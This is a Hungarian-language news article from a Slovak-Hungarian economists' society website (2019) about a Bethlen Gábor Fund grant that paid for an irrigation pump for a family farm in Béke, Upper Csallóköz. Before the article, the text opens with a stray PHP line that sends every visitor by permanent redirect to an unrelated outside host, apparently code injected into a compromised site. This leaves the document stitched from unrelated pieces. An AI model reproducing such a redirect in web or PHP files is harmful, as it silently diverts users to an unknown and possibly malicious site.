header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> Bethlen Gábor Alap támogatása öntözőberendezésre egy felső-csallóközi őstermelőnek
szombat, május 25, 2019

Keresés

Bethlen Gábor Alap támogatása öntözőberendezésre egy felső-csallóközi őstermelőnek

2634Az elmúlt két évtizedben tapasztalt globális éghajlati változások jelentős mértékben sújtották a Felvidéket is, elsősorban a kevesebb évi csapadék és a hosszan tartó forróságok okoztak számtalan problémát az itt gazdálkodó földművesek számára. Felvidék több régiójában, így a Felső-Csallóközben is az egyre gyakoribb és elhúzódó száraz időszakok miatt öntözés nélkül nem lehet eredményes munkát, növénytermesztést végezni.


A békei Pósfay László őstermelő és családi vállalkozása az egyik legszínesebb agrárvállalkozás a Felső-Csallóközben, hiszen széles termékskálát állít elő: malomipari búzát, sörárpát, étkezési kukoricát, zöldtrágya vetőmagokat – facélia, mustár, olajretek, takarmányborsót, repcemagot, olajtököt, napraforgót. A gazdaságban előállított árpa az Ógyallai sörgyárba kerül, a búza nagy részét a malomipar használja fel, kisebb részét az állattenyésztés. A kukorica teljes mennyiségét a Nestlének értékesítik, corn flakes készül belőle. A borsót, repcét, olajtököt a dunaszerdahelyi Agrosidnak, - termelési és értékesítési szövetkezet – adják el, ők értékesítik tovább.
Az elmúlt évek aszálykárait követően Pósfay László felvidéki magyar családi vállalkozás számára szükség volt egy olyan innovatív öntözőgép beszerzésére, amely lehetővé teszi az öntözést szárazságok idején, amikor nincs kellő csapadék a termelt növénykultúrák számára.
2017-ben a békei őstermelő sikeresen pályázott a Bethlen Gábor Alapnál azon pályázati felhívás keretében, ami a „Magyarországgal szomszédos országokban nyilvántartott és működő magyar családi vállalkozások tevékenységét támogatta". A Bethlen Gábor Alap által nyújtott 4 500 000 forint támogatásnak köszönhetően sikerült beszereznie egy SCOVA I73C003 Iveco Caprari diesel motoros szivattyú aggregátot, amely eszköz hozzájárul már a 2018-as esztendőben az öntözés által a hozamnövekedéshez, Felső-Csallóköz mezőgazdasági piacának élénkítéséhez.
Pósfay László elmondta, hogy a Bethlen Gábor Alap támogatása lényegesen segíti a családi agrárvállalkozásának piaci versenyképességét, őstermelőként ugyanis nehéz versenyeznie a modern gépparkkal rendelkező és sok ezer hektárt megművelő nagy dán, holland illetve hazai agrárvállalatokkal. Az őstermelő továbbá megjegyezte, hogy úgy látja, hogy a többi felvidéki kisgazda is kik támogatást nyertek 2017-ben a külhoni magyar családi vállalkozások éve program keretében a Bethlen Gábor Alapnál nem csak árut állítanak elő, hanem őrzik egyben a magyar kultúrát is, a magyar megmaradás, közösség motorjai is. Pósfay László végezetül elmondta, hogy a beruházásnak köszönhetően középtávon bővíteni szeretnék a tökmagtermelésüket, a megtermelt tökmagból szeretnénk olajat sajtolni és legalább 2 új munkaerőt alkalmazni, s fokozatosan bővíteni a földterületeiket is.

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia